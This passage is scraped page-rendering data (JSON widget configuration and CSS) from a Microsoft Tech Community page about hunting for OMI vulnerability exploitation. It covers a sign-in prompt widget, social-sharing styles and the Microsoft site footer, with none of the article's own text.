the\r\ncarousel\",\"possibleValues\":null,\"__typename\":\"FormField\"}],\"layout\":{\"rows\":\r\n[{\"id\":\"widgetChooserGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"widgetChooser\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":\r\n{\"id\":\"titleGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":[{\"id\":\"title\",\"className\":null,\"__typename\":\"FormFieldRef\"},\r\n{\"id\":\"useTitle\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":null,\"to\r\n{\"id\":\"useBackground\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"useBackground\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\"\r\n{\"id\":\"widgetVisibility\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"widgetVisibility\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\"\r\n{\"id\":\"moreOptionsGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"moreOptions\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":nu\r\n{\"id\":\"componentPropsGroup\",\"type\":\"fieldset\",\"as\":null,\"items\":\r\n[{\"id\":\"cMax_items\",\"className\":null,\"__typename\":\"FormFieldRef\"}],\"props\":null,\"legend\":null,\"description\":null,\"className\":null,\"viewVariant\":nu\r\nen-us-1774591586939\":{\"__typename\":\"CachedAsset\",\"id\":\"component:custom.widget.UnregisteredCTAWidget-en-us-1774591586939\",\"value\":{\"component\":{\"id\":\"custom.widget.UnregisteredCTAWidget\",\"template\":\r\n{\"id\":\"UnregisteredCTAWidget\",\"markupLanguage\":\"REACT\",\"style\":null,\"texts\":{\"register.communityHub\":\"Welcome to\r\nthe {name} Community Hub. Sign in to like, participate, or start a conversation.\",\"register.category\":\"Welcome to the\r\n{name} Community Hub. Sign in to like, participate, or start a conversation.\",\"register.discussionBoard\":\"Welcome to the\r\n{name} space. Sign in to like, reply, or start a discussion.\",\"register.blogSpace\":\"Welcome to the {name} space. Sign in to\r\nlike or comment on articles in this space.\",\"register.eventSpace\":\"Welcome to the {name} space. Sign in to RSVP, add\r\nevents to your calendar, and join the conversation.\",\"register.ideaSpace\":\"Welcome to the {name} space. Sign in to vote,\r\ncomment, or submit your own feedback.\",\"buttonRegister\":\"Sign in\",\"register.discussionBoardArticle\":\"Have a question or\r\ninsight to share? Sign in to join the discussion.\",\"register.blogSpaceArticle\":\"Enjoying the article? Sign in to share your\r\nthoughts.\",\"register.eventSpaceArticle\":\"Don’t just watch - take part. Sign in to RSVP, ask questions, and join the\r\ndiscussion.\",\"register.ideaSpaceArticle\":\"Sign in to submit ideas, upvote ideas, and join the conversation.\"},\"defaults\":\r\n{\"config\":{\"applicablePages\":\r\n[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"components\":\r\n[{\"id\":\"custom.widget.UnregisteredCTAWidget\",\"form\":null,\"config\":null,\"props\":\r\n[],\"__typename\":\"Component\"}],\"grouping\":\"CUSTOM\",\"__typename\":\"ComponentTemplate\"},\"properties\":{\"config\":\r\n{\"applicablePages\":[],\"description\":null,\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"form\":null,\"__typename\":\"Component\",\"localOverride\":false},\"globalCss\":null,\"form\":null},\"localOverride\":\r\nen-us-1774591586939\":{\"__typename\":\"CachedAsset\",\"id\":\"component:custom.widget.SocialSharing-en-us-1774591586939\",\"value\":{\"component\":{\"id\":\"custom.widget.SocialSharing\",\"template\":\r\n{\"id\":\"SocialSharing\",\"markupLanguage\":\"HANDLEBARS\",\"style\":\".sharePage {\\n display: flex;\\n justify-content:\r\ncenter;\\n background: #d7d7d7;\\n padding: 0px;\\n height: 60px;\\n}\\n.singleSocialIcons {\\n display: flex;\\n gap: 12px;\\n list-style-type: none;\\n padding: 0px;\\n margin: 0;\\n}\\n.containers {\\n display: flex;\\n gap: 30px;\\n}\\n\\n.listIcon {\\n align-content: center;\\n}\\n.headingShare {\\n display: inline;\\n margin-right: 25px;\\n margin-bottom: 0px;\\n font-size: 20px;\\n\r\nfont-weight: 550;\\n align-content: center;\\n}\\n\\n@media (max-width: 990px) {\\n .sharePage {\\n display: flex;\\n justify-content: center;\\n }\\n\\n .containers {\\n display: inline-block;\\n justify-content: center;\\n align-content: center;\\n align-items:\r\ncenter;\\n }\\n .headingShare {\\n display: flex;\\n justify-content: center;\\n }\\n .singleSocialIcons {\\n\r\n}\\n}\\n\",\"texts\":null,\"defaults\":{\"config\":{\"applicablePages\":[],\"description\":\"Adds buttons to share to various social media\r\nwebsites\",\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"components\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 29 of 38\n\n[{\"id\":\"custom.widget.SocialSharing\",\"form\":null,\"config\":null,\"props\":\r\n[],\"__typename\":\"Component\"}],\"grouping\":\"CUSTOM\",\"__typename\":\"ComponentTemplate\"},\"properties\":{\"config\":\r\n{\"applicablePages\":[],\"description\":\"Adds buttons to share to various social media\r\nwebsites\",\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"form\":null,\"__typename\":\"Component\",\"localOverride\":false},\"globalCss\":\r\n{\"css\":\".custom_widget_SocialSharing_sharePage_6x3n8_1 {\\n display: flex;\\n justify-content: center;\\n background:\r\n#d7d7d7;\\n padding: 0;\\n height: 3.75rem;\\n}\\n.custom_widget_SocialSharing_singleSocialIcons_6x3n8_8 {\\n display:\r\nflex;\\n gap: 0.75rem;\\n list-style-type: none;\\n padding: 0;\\n margin:\r\n0;\\n}\\n.custom_widget_SocialSharing_containers_6x3n8_15 {\\n display: flex;\\n gap:\r\n1.875rem;\\n}\\n.custom_widget_SocialSharing_listIcon_6x3n8_20 {\\n align-content:\r\ncenter;\\n}\\n.custom_widget_SocialSharing_headingShare_6x3n8_23 {\\n display: inline;\\n margin-right: 1.5625rem;\\n\r\nmargin-bottom: 0;\\n font-size: 1.25rem;\\n font-weight: 550;\\n align-content: center;\\n}\\n@media (max-width: 990px) {\\n\r\n.custom_widget_SocialSharing_sharePage_6x3n8_1 {\\n display: flex;\\n justify-content: center;\\n }\\n\\n\r\n.custom_widget_SocialSharing_containers_6x3n8_15 {\\n display: inline-block;\\n justify-content: center;\\n align-content:\r\ncenter;\\n align-items: center;\\n }\\n .custom_widget_SocialSharing_headingShare_6x3n8_23 {\\n display: flex;\\n justify-content: center;\\n }\\n .custom_widget_SocialSharing_singleSocialIcons_6x3n8_8 {\\n }\\n}\\n\",\"tokens\":\r\n{\"sharePage\":\"custom_widget_SocialSharing_sharePage_6x3n8_1\",\"singleSocialIcons\":\"custom_widget_SocialSharing_singleSocialIcons_6x3n8_8\",\"co\r\nen-us-1774591586939\":{\"__typename\":\"CachedAsset\",\"id\":\"component:custom.widget.MicrosoftFooter-en-us-1774591586939\",\"value\":{\"component\":{\"id\":\"custom.widget.MicrosoftFooter\",\"template\":\r\n{\"id\":\"MicrosoftFooter\",\"markupLanguage\":\"HANDLEBARS\",\"style\":\".context-uhf {\\r\\n min-width: 280px;\\r\\n font-size:\r\n15px;\\r\\n box-sizing: border-box;\\r\\n -ms-text-size-adjust: 100%;\\r\\n -webkit-text-size-adjust: 100%;\\r\\n \u0026 *,\\r\\n \u0026\r\n*:before,\\r\\n \u0026 *:after {\\r\\n box-sizing: inherit;\\r\\n }\\r\\n a.c-uhff-link {\\r\\n color: #616161;\\r\\n word-break: break-word;\\r\\n\r\ntext-decoration: none;\\r\\n }\\r\\n \u0026a:link,\\r\\n \u0026a:focus,\\r\\n \u0026a:hover,\\r\\n \u0026a:active,\\r\\n \u0026a:visited {\\r\\n text-decoration:\r\nnone;\\r\\n color: inherit;\\r\\n }\\r\\n \u0026 div {\\r\\n font-family: 'Segoe UI', SegoeUI, 'Helvetica Neue', Helvetica, Arial, sans-serif;\\r\\n }\\r\\n}\\r\\n.c-uhff {\\r\\n background: #f2f2f2;\\r\\n margin: -1.5625;\\r\\n width: auto;\\r\\n height: auto;\\r\\n}\\r\\n.c-uhff-nav {\\r\\n margin: 0 auto;\\r\\n max-width: calc(1600px + 10%);\\r\\n padding: 0 5%;\\r\\n box-sizing: inherit;\\r\\n \u0026:before,\\r\\n\r\n\u0026:after {\\r\\n content: ' ';\\r\\n display: table;\\r\\n clear: left;\\r\\n }\\r\\n @media only screen and (max-width: 1083px) {\\r\\n\r\npadding-left: 12px;\\r\\n }\\r\\n .c-heading-4 {\\r\\n color: #616161;\\r\\n word-break: break-word;\\r\\n font-size: 15px;\\r\\n line-height: 20px;\\r\\n padding: 36px 0 4px;\\r\\n font-weight: 600;\\r\\n }\\r\\n .c-uhff-nav-row {\\r\\n .c-uhff-nav-group {\\r\\n display:\r\nblock;\\r\\n float: left;\\r\\n min-height: 1px;\\r\\n vertical-align: text-top;\\r\\n padding: 0 12px;\\r\\n width: 100%;\\r\\n zoom: 1;\\r\\n\r\n\u0026:first-child {\\r\\n padding-left: 0;\\r\\n @media only screen and (max-width: 1083px) {\\r\\n padding-left: 12px;\\r\\n }\\r\\n }\\r\\n\r\n@media only screen and (min-width: 540px) and (max-width: 1082px) {\\r\\n width: 33.33333%;\\r\\n }\\r\\n @media only\r\nscreen and (min-width: 1083px) {\\r\\n width: 16.6666666667%;\\r\\n }\\r\\n ul.c-list.f-bare {\\r\\n font-size: 11px;\\r\\n line-height:\r\n16px;\\r\\n margin-top: 0;\\r\\n margin-bottom: 0;\\r\\n padding-left: 0;\\r\\n list-style-type: none;\\r\\n li {\\r\\n word-break: break-word;\\r\\n padding: 8px 0;\\r\\n margin: 0;\\r\\n }\\r\\n }\\r\\n }\\r\\n }\\r\\n}\\r\\n.c-uhff-base {\\r\\n background: #f2f2f2;\\r\\n margin: 0\r\nauto;\\r\\n max-width: calc(1600px + 10%);\\r\\n padding: 30px 5% 16px;\\r\\n \u0026:before,\\r\\n \u0026:after {\\r\\n content: ' ';\\r\\n\r\ndisplay: table;\\r\\n }\\r\\n \u0026:after {\\r\\n clear: both;\\r\\n }\\r\\n a.c-uhff-ccpa,\\r\\n a.c-uhff-consumer {\\r\\n display: flex;\\r\\n float:\r\nleft;\\r\\n font-size: 11px;\\r\\n line-height: 16px;\\r\\n padding: 4px 24px 0 0;\\r\\n }\\r\\n a.c-uhff-ccpa:hover,\\r\\n a.c-uhff-consumer:hover {\\r\\n text-decoration: underline;\\r\\n }\\r\\n ul.c-list {\\r\\n font-size: 11px;\\r\\n line-height: 16px;\\r\\n float:\r\nright;\\r\\n margin: 3px 0;\\r\\n color: #616161;\\r\\n li {\\r\\n padding: 0 24px 4px 0;\\r\\n display: inline-block;\\r\\n }\\r\\n }\\r\\n .c-list.f-bare {\\r\\n padding-left: 0;\\r\\n list-style-type: none;\\r\\n }\\r\\n @media only screen and (max-width: 1083px) {\\r\\n\r\ndisplay: flex;\\r\\n flex-wrap: wrap;\\r\\n padding: 30px 24px 16px;\\r\\n }\\r\\n}\\r\\n\\r\\n.social-share {\\r\\n position: fixed;\\r\\n top:\r\n60%;\\r\\n transform: translateY(-50%);\\r\\n left: 0;\\r\\n z-index: 1000;\\r\\n}\\r\\n\\r\\n.sharing-options {\\r\\n list-style: none;\\r\\n\r\npadding: 0;\\r\\n margin: 0;\\r\\n display: block;\\r\\n flex-direction: column;\\r\\n background-color: white;\\r\\n width: 50px;\\r\\n\r\nborder-radius: 0px 7px 7px 0px;\\r\\n}\\r\\n.linkedin-icon {\\r\\n border-top-right-radius: 7px;\\r\\n}\\r\\n.linkedin-icon:hover {\\r\\n\r\nborder-radius: 0;\\r\\n}\\r\\n\\r\\n.social-share-email-image:hover {\\r\\n border-radius: 0;\\r\\n}\\r\\n\\r\\n.social-link-footer:hover\r\n.linkedin-icon {\\r\\n border-radius: 0;\\r\\n}\\r\\n.social-link-footer:hover .social-share-email-image {\\r\\n border-radius:\r\n0;\\r\\n}\\r\\n\\r\\n.social-link-footer img {\\r\\n width: 30px;\\r\\n height: auto;\\r\\n transition: filter 0.3s ease;\\r\\n}\\r\\n\\r\\n.social-share-list {\\r\\n width: 50px;\\r\\n}\\r\\n.social-share-rss-image {\\r\\n width: 30px;\\r\\n height: auto;\\r\\n transition: filter 0.3s\r\nease;\\r\\n}\\r\\n.sharing-options li {\\r\\n width: 50px;\\r\\n height: 50px;\\r\\n padding: 8px;\\r\\n box-sizing: border-box;\\r\\n border:\r\n2px solid white;\\r\\n display: inline-block;\\r\\n text-align: center;\\r\\n opacity: 1;\\r\\n visibility: visible;\\r\\n transition: border\r\n0.3s ease; /* Smooth transition effect */\\r\\n border-left: none;\\r\\n border-bottom: none; /* Apply bottom border to only last\r\nitem */\\r\\n}\\r\\n\\r\\n.social-share-list-linkedin {\\r\\n background-color: #0474b4;\\r\\n border-top-right-radius: 5px; /* Rounded\r\ntop right corner of first item*/\\r\\n}\\r\\n.social-share-list-facebook {\\r\\n background-color: #3c5c9c;\\r\\n}\\r\\n.social-share-list-xicon {\\r\\n background-color: #000;\\r\\n}\\r\\n.social-share-list-reddit {\\r\\n background-color: #fc4404;\\r\\n}\\r\\n.social-share-list-bluesky {\\r\\n background-color: #f0f2f5;\\r\\n}\\r\\n.social-share-list-rss {\\r\\n background-color: #ec7b1c;\\r\\n}\\r\\n.social-share-list-mail {\\r\\n background-color: #848484;\\r\\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of last\r\nitem*/\\r\\n}\\r\\n.sharing-options li.social-share-list-mail {\\r\\n border-bottom: 2px solid white; /* Add bottom border only to\r\nthe last item */\\r\\n height: 52px; /* Increase last child height to make in align with the hover label */\\r\\n}\\r\\n.x-icon {\\r\\n\r\nfilter: invert(100%);\\r\\n transition: filter 0.3s ease;\\r\\n width: 20px !important;\\r\\n height: auto;\\r\\n padding-top: 5px\r\n!important;\\r\\n}\\r\\n.bluesky-icon {\\r\\n filter: invert(20%) sepia(100%) saturate(3000%) hue-rotate(180deg);\\r\\n transition:\r\nfilter 0.3s ease;\\r\\n padding-top: 5px !important;\\r\\n width: 25px !important;\\r\\n}\\r\\n\\r\\n.share-icon {\\r\\n border: 2px solid\r\ntransparent;\\r\\n display: inline-block;\\r\\n position: relative;\\r\\n}\\r\\n\\r\\n.sharing-options li:hover {\\r\\n border: 2px solid\r\nwhite;\\r\\n border-left: none;\\r\\n border-bottom: none;\\r\\n border-radius: 0px;\\r\\n}\\r\\n.sharing-options li.social-share-list-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 30 of 38\n\nmail:hover {\\r\\n border-bottom: 2px solid white; /* Add bottom border only to the last item */\\r\\n}\\r\\n\\r\\n.sharing-options\r\nli:hover .label {\\r\\n opacity: 1;\\r\\n visibility: visible;\\r\\n border: 2px solid white;\\r\\n box-sizing: border-box;\\r\\n border-left:\r\nnone;\\r\\n}\\r\\n\\r\\n.label {\\r\\n position: absolute;\\r\\n left: 100%;\\r\\n white-space: nowrap;\\r\\n opacity: 0;\\r\\n visibility:\r\nhidden;\\r\\n transition: all 0.2s ease;\\r\\n color: white;\\r\\n border-radius: 0 10 0 10px;\\r\\n top: 50%;\\r\\n transform:\r\ntranslateY(-50%);\\r\\n height: 52px;\\r\\n display: flex;\\r\\n align-items: center;\\r\\n justify-content: center;\\r\\n padding: 10px\r\n12px 15px 8px;\\r\\n border: 2px solid white;\\r\\n}\\r\\n.linkedin {\\r\\n background-color: #0474b4;\\r\\n border-top-right-radius:\r\n5px; /* Rounded top right corner of first item*/\\r\\n}\\r\\n.facebook {\\r\\n background-color: #3c5c9c;\\r\\n}\\r\\n.twitter {\\r\\n\r\nbackground-color: black;\\r\\n color: white;\\r\\n}\\r\\n.reddit {\\r\\n background-color: #fc4404;\\r\\n}\\r\\n.mail {\\r\\n background-color: #848484;\\r\\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of last item*/\\r\\n}\\r\\n.bluesky {\\r\\n\r\nbackground-color: #f0f2f5;\\r\\n color: black;\\r\\n}\\r\\n.rss {\\r\\n background-color: #ec7b1c;\\r\\n}\\r\\n\\r\\n@media (max-width:\r\n991px) {\\r\\n .social-share {\\r\\n display: none;\\r\\n }\\r\\n}\\r\\n\",\"texts\":{\"heading.whatsNew\":\"What's\r\nnew\",\"heading.store\":\"Microsoft\r\nStore\",\"heading.education\":\"Education\",\"heading.business\":\"Business\",\"heading.developer\":\"Developer \u0026\r\nIT\",\"heading.company\":\"Company\",\"link.whatsNew.surfacePro\":\"Surface Pro\",\"aria.whatsNew.surfacePro\":\"Surface Pro\r\nWhat's new\",\"link.whatsNew.surfaceLaptop\":\"Surface Laptop\",\"aria.whatsNew.surfaceLaptop\":\"Surface Laptop What's\r\nnew\",\"link.whatsNew.surfaceLaptopStudio2\":\"Surface Laptop Studio 2\",\"aria.whatsNew.surfaceLaptopStudio2\":\"Surface\r\nLaptop Studio 2 What's new\",\"link.whatsNew.copilotOrganizations\":\"Copilot for\r\norganizations\",\"aria.whatsNew.copilotOrganizations\":\"Copilot for organizations What's\r\nnew\",\"link.whatsNew.copilotPersonal\":\"Copilot for personal use\",\"aria.whatsNew.copilotPersonal\":\"Copilot for personal\r\nuse What's new\",\"link.whatsNew.aiInWindows\":\"AI in Windows\",\"aria.whatsNew.aiInWindows\":\"AI in Windows What's\r\nnew\",\"link.whatsNew.exploreProducts\":\"Explore Microsoft products\",\"aria.whatsNew.exploreProducts\":\"Explore Microsoft\r\nproducts What's new\",\"link.whatsNew.windows11Apps\":\"Windows 11 apps\",\"aria.whatsNew.windows11Apps\":\"Windows\r\n11 apps What's new\",\"link.store.accountProfile\":\"Account profile\",\"aria.store.accountProfile\":\"Account profile Microsoft\r\nStore\",\"link.store.downloadCenter\":\"Download Center\",\"aria.store.downloadCenter\":\"Download Center Microsoft\r\nStore\",\"link.store.support\":\"Microsoft Store support\",\"aria.store.support\":\"Microsoft Store support Microsoft\r\nStore\",\"link.store.returns\":\"Returns\",\"aria.store.returns\":\"Returns Microsoft Store\",\"link.store.orderTracking\":\"Order\r\ntracking\",\"aria.store.orderTracking\":\"Order tracking Microsoft Store\",\"link.store.certifiedRefurbished\":\"Certified\r\nRefurbished\",\"aria.store.certifiedRefurbished\":\"Certified Refurbished Microsoft Store\",\"link.store.promise\":\"Microsoft\r\nStore Promise\",\"aria.store.promise\":\"Microsoft Store Promise Microsoft Store\",\"link.store.flexiblePayments\":\"Flexible\r\nPayments\",\"aria.store.flexiblePayments\":\"Flexible Payments Microsoft\r\nStore\",\"link.education.microsoftInEducation\":\"Microsoft in education\",\"aria.education.microsoftInEducation\":\"Microsoft in\r\neducation Education\",\"link.education.devices\":\"Devices for education\",\"aria.education.devices\":\"Devices for education\r\nEducation\",\"link.education.teams\":\"Microsoft Teams for Education\",\"aria.education.teams\":\"Microsoft Teams for Education\r\nEducation\",\"link.education.m365\":\"Microsoft 365 Education\",\"aria.education.m365\":\"Microsoft 365 Education\r\nEducation\",\"link.education.howToBuy\":\"How to buy for your school\",\"aria.education.howToBuy\":\"How to buy for your\r\nschool Education\",\"link.education.training\":\"Educator training and development\",\"aria.education.training\":\"Educator\r\ntraining and development Education\",\"link.education.deals\":\"Deals for students and parents\",\"aria.education.deals\":\"Deals\r\nfor students and parents Education\",\"link.education.ai\":\"AI for education\",\"aria.education.ai\":\"AI for education\r\nEducation\",\"link.business.microsoftAi\":\"Microsoft AI\",\"aria.business.microsoftAi\":\"Microsoft AI\r\nBusiness\",\"link.business.security\":\"Microsoft Security\",\"aria.business.security\":\"Microsoft Security\r\nBusiness\",\"link.business.dynamics\":\"Dynamics 365\",\"aria.business.dynamics\":\"Dynamics 365\r\nBusiness\",\"link.business.m365\":\"Microsoft 365\",\"aria.business.m365\":\"Microsoft 365\r\nBusiness\",\"link.business.powerPlatform\":\"Microsoft Power Platform\",\"aria.business.powerPlatform\":\"Microsoft Power\r\nPlatform Business\",\"link.business.teams\":\"Microsoft Teams\",\"aria.business.teams\":\"Microsoft Teams\r\nBusiness\",\"link.business.m365Copilot\":\"Microsoft 365 Copilot\",\"aria.business.m365Copilot\":\"Microsoft 365 Copilot\r\nBusiness\",\"link.business.smallBusiness\":\"Small Business\",\"aria.business.smallBusiness\":\"Small Business\r\nBusiness\",\"link.developer.azure\":\"Azure\",\"aria.developer.azure\":\"Azure Developer \u0026\r\nIT\",\"link.developer.developerCenter\":\"Microsoft Developer\",\"aria.developer.developerCenter\":\"Microsoft Developer\r\nDeveloper \u0026 IT\",\"link.developer.learn\":\"Microsoft Learn\",\"aria.developer.learn\":\"Microsoft Learn Developer \u0026\r\nIT\",\"link.developer.aiMarketplace\":\"Support for AI marketplace apps\",\"aria.developer.aiMarketplace\":\"Support for AI\r\nmarketplace apps Developer \u0026 IT\",\"link.developer.techCommunity\":\"Microsoft Tech\r\nCommunity\",\"aria.developer.techCommunity\":\"Microsoft Tech Community Developer \u0026\r\nIT\",\"link.developer.marketplace\":\"Microsoft Marketplace\",\"aria.developer.marketplace\":\"Microsoft Marketplace Developer\r\n\u0026 IT\",\"link.developer.marketplaceRewards\":\"Marketplace Rewards\",\"aria.developer.marketplaceRewards\":\"Marketplace\r\nRewards Developer \u0026 IT\",\"link.developer.visualStudio\":\"Visual Studio\",\"aria.developer.visualStudio\":\"Visual Studio\r\nDeveloper \u0026 IT\",\"link.company.careers\":\"Careers\",\"aria.company.careers\":\"Careers\r\nCompany\",\"link.company.about\":\"About Microsoft\",\"aria.company.about\":\"About Microsoft\r\nCompany\",\"link.company.news\":\"Company news\",\"aria.company.news\":\"Company news\r\nCompany\",\"link.company.privacy\":\"Privacy at Microsoft\",\"aria.company.privacy\":\"Privacy at Microsoft\r\nCompany\",\"link.company.investors\":\"Investors\",\"aria.company.investors\":\"Investors\r\nCompany\",\"link.company.diversity\":\"Diversity and inclusion\",\"aria.company.diversity\":\"Diversity and inclusion\r\nCompany\",\"link.company.accessibility\":\"Accessibility\",\"aria.company.accessibility\":\"Accessibility\r\nCompany\",\"link.company.sustainability\":\"Sustainability\",\"aria.company.sustainability\":\"Sustainability\r\nCompany\",\"ccpa.label\":\"Your Privacy Choices\",\"consumerhealthprivacy.label\":\"Consumer Health\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 31 of 38\n\nPrivacy\",\"corp.sitemap\":\"Sitemap\",\"corp.contact\":\"Contact\r\nMicrosoft\",\"corp.privacy\":\"Privacy\",\"corp.manageCookies\":\"Manage cookies\",\"corp.terms\":\"Terms of\r\nuse\",\"corp.trademarks\":\"Trademarks\",\"corp.safetyEco\":\"Safety \u0026\r\neco\",\"corp.recycling\":\"Recycling\",\"corp.aboutAds\":\"About our\r\nads\",\"corp.microsoft\":\"Microsoft\",\"social.linkedin.alt\":\"Share to LinkedIn\",\"social.linkedin.label\":\"Share on\r\nLinkedIn\",\"social.facebook.alt\":\"Share to Facebook\",\"social.facebook.label\":\"Share on Facebook\",\"social.x.alt\":\"Share to\r\nX\",\"social.x.label\":\"Share on X\",\"social.reddit.alt\":\"Share to Reddit\",\"social.reddit.label\":\"Share on\r\nReddit\",\"social.bluesky.alt\":\"Share to Blue Sky\",\"social.bluesky.label\":\"Share on Bluesky\",\"social.rss.alt\":\"Subscribe to\r\nRSS\",\"social.rss.label\":\"Share on RSS\",\"social.email.alt\":\"Share to Email\",\"social.email.label\":\"Share on\r\nEmail\"},\"defaults\":{\"config\":{\"applicablePages\":[],\"description\":\"The Microsoft\r\nFooter\",\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"components\":\r\n[{\"id\":\"custom.widget.MicrosoftFooter\",\"form\":null,\"config\":null,\"props\":\r\n[],\"__typename\":\"Component\"}],\"grouping\":\"CUSTOM\",\"__typename\":\"ComponentTemplate\"},\"properties\":{\"config\":\r\n{\"applicablePages\":[],\"description\":\"The Microsoft\r\nFooter\",\"fetchedContent\":null,\"__typename\":\"ComponentConfiguration\"},\"props\":\r\n[],\"__typename\":\"ComponentProperties\"},\"form\":null,\"__typename\":\"Component\",\"localOverride\":false},\"globalCss\":\r\n{\"css\":\".custom_widget_MicrosoftFooter_context-uhf_qp4x5_1 {\\r\\n min-width: 17.5rem;\\r\\n font-size: 0.9375rem;\\r\\n\r\nbox-sizing: border-box;\\r\\n -ms-text-size-adjust: 100%;\\r\\n -webkit-text-size-adjust: 100%;\\r\\n \u0026 *,\\r\\n \u0026 *:before,\\r\\n \u0026\r\n*:after {\\r\\n box-sizing: inherit;\\r\\n }\\r\\n a.custom_widget_MicrosoftFooter_c-uhff-link_qp4x5_23 {\\r\\n color: #616161;\\r\\n\r\nword-break: break-word;\\r\\n text-decoration: none;\\r\\n }\\r\\n \u0026a:link,\\r\\n \u0026a:focus,\\r\\n \u0026a:hover,\\r\\n \u0026a:active,\\r\\n\r\n\u0026a:visited {\\r\\n text-decoration: none;\\r\\n color: inherit;\\r\\n }\\r\\n \u0026 div {\\r\\n font-family: 'Segoe UI', SegoeUI, 'Helvetica\r\nNeue', Helvetica, Arial, sans-serif;\\r\\n }\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_c-uhff_qp4x5_23 {\\r\\n background:\r\n#f2f2f2;\\r\\n margin: -1.5625;\\r\\n width: auto;\\r\\n height: auto;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_c-uhff-nav_qp4x5_69 {\\r\\n margin: 0 auto;\\r\\n max-width: calc(100rem + 10%);\\r\\n padding: 0 5%;\\r\\n box-sizing: inherit;\\r\\n\r\n\u0026:before,\\r\\n \u0026:after {\\r\\n content: ' ';\\r\\n display: table;\\r\\n clear: left;\\r\\n }\\r\\n @media only screen and (max-width:\r\n1083px) {\\r\\n padding-left: 0.75rem;\\r\\n }\\r\\n .custom_widget_MicrosoftFooter_c-heading-4_qp4x5_97 {\\r\\n color:\r\n#616161;\\r\\n word-break: break-word;\\r\\n font-size: 0.9375rem;\\r\\n line-height: 1.25rem;\\r\\n padding: 2.25rem 0\r\n0.25rem;\\r\\n font-weight: 600;\\r\\n }\\r\\n .custom_widget_MicrosoftFooter_c-uhff-nav-row_qp4x5_113 {\\r\\n\r\n.custom_widget_MicrosoftFooter_c-uhff-nav-group_qp4x5_115 {\\r\\n display: block;\\r\\n float: left;\\r\\n min-height:\r\n0.0625rem;\\r\\n vertical-align: text-top;\\r\\n padding: 0 0.75rem;\\r\\n width: 100%;\\r\\n zoom: 1;\\r\\n \u0026:first-child {\\r\\n padding-left: 0;\\r\\n @media only screen and (max-width: 1083px) {\\r\\n padding-left: 0.75rem;\\r\\n }\\r\\n }\\r\\n @media only screen\r\nand (min-width: 540px) and (max-width: 1082px) {\\r\\n width: 33.33333%;\\r\\n }\\r\\n @media only screen and (min-width:\r\n1083px) {\\r\\n width: 16.6666666667%;\\r\\n }\\r\\n ul.custom_widget_MicrosoftFooter_c-list_qp4x5_155.custom_widget_MicrosoftFooter_f-bare_qp4x5_155 {\\r\\n font-size: 0.6875rem;\\r\\n line-height: 1rem;\\r\\n\r\nmargin-top: 0;\\r\\n margin-bottom: 0;\\r\\n padding-left: 0;\\r\\n list-style-type: none;\\r\\n li {\\r\\n word-break: break-word;\\r\\n\r\npadding: 0.5rem 0;\\r\\n margin: 0;\\r\\n }\\r\\n }\\r\\n }\\r\\n }\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_c-uhff-base_qp4x5_187\r\n{\\r\\n background: #f2f2f2;\\r\\n margin: 0 auto;\\r\\n max-width: calc(100rem + 10%);\\r\\n padding: 1.875rem 5% 1rem;\\r\\n\r\n\u0026:before,\\r\\n \u0026:after {\\r\\n content: ' ';\\r\\n display: table;\\r\\n }\\r\\n \u0026:after {\\r\\n clear: both;\\r\\n }\\r\\n\r\na.custom_widget_MicrosoftFooter_c-uhff-ccpa_qp4x5_213,\\r\\n a.custom_widget_MicrosoftFooter_c-uhff-consumer_qp4x5_215 {\\r\\n display: flex;\\r\\n float: left;\\r\\n font-size: 0.6875rem;\\r\\n line-height: 1rem;\\r\\n padding: 0.25rem\r\n1.5rem 0 0;\\r\\n }\\r\\n a.custom_widget_MicrosoftFooter_c-uhff-ccpa_qp4x5_213:hover,\\r\\n\r\na.custom_widget_MicrosoftFooter_c-uhff-consumer_qp4x5_215:hover {\\r\\n text-decoration: underline;\\r\\n }\\r\\n\r\nul.custom_widget_MicrosoftFooter_c-list_qp4x5_155 {\\r\\n font-size: 0.6875rem;\\r\\n line-height: 1rem;\\r\\n float: right;\\r\\n\r\nmargin: 0.1875rem 0;\\r\\n color: #616161;\\r\\n li {\\r\\n padding: 0 1.5rem 0.25rem 0;\\r\\n display: inline-block;\\r\\n }\\r\\n }\\r\\n\r\n.custom_widget_MicrosoftFooter_c-list_qp4x5_155.custom_widget_MicrosoftFooter_f-bare_qp4x5_155 {\\r\\n padding-left:\r\n0;\\r\\n list-style-type: none;\\r\\n }\\r\\n @media only screen and (max-width: 